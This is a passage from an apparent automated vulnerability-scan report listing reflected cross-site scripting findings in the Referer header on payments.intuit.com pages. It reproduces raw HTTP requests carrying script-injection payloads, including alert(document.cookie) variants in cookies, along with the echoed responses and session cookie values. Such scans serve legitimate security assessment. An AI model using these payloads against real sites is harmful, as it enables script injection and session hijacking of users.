Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tTq9ajC5PZElam4-oVcSCw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D170C0A0805192AA117E3237716BD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161385

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65';
                   </script>
...[SNIP]...

1.12. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a8e31--><script>alert(1)</script>c61fa29957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wS+X-3WZ22Sb1ieL6oQWjQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D675E0A0805192AA117E370ACEEA8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161415

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957 | -->
...[SNIP]...

1.13. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2b9'-alert(1)-'7fe9fab8e6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iwPi7b+G6IfPR6znHCFUhg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C5B0E0A0805192AA117E38A762F0C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93324

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e';
                   </script>
...[SNIP]...

1.14. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 23a44--><script>alert(1)</script>72e2675b5fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pM50lYZPFnVXgi0T1ha39Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CA4950A0805192AA117E3F21B5F83
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93356

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc | -->
...[SNIP]...

1.15. http://payments.intuit.com/products/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 50367--><script>alert(1)</script>6c1e00f3f20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=M3gX+mVoiuIkcOt8Esi4Yg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B59C30A0805192AA117E3428028B0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90447

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20 | -->
...[SNIP]...

1.16. http://payments.intuit.com/products/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e9a'-alert(1)-'1f622a992cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:04 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=DO4qqh6ksP6Oy77tMujZxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B06050A0805192AA117E3BEDF55B4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90415

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd';
                   </script>
...[SNIP]...

1.17. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab319'-alert(1)-'38984c7dc20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:42 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=YrtBHerYg+WK2DeOsiYbiA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:43 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C84210A0805192AA117E3CFC85132
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20';
                   </script>
...[SNIP]...

1.18. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3d056--><script>alert(1)</script>4284ad0a88b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 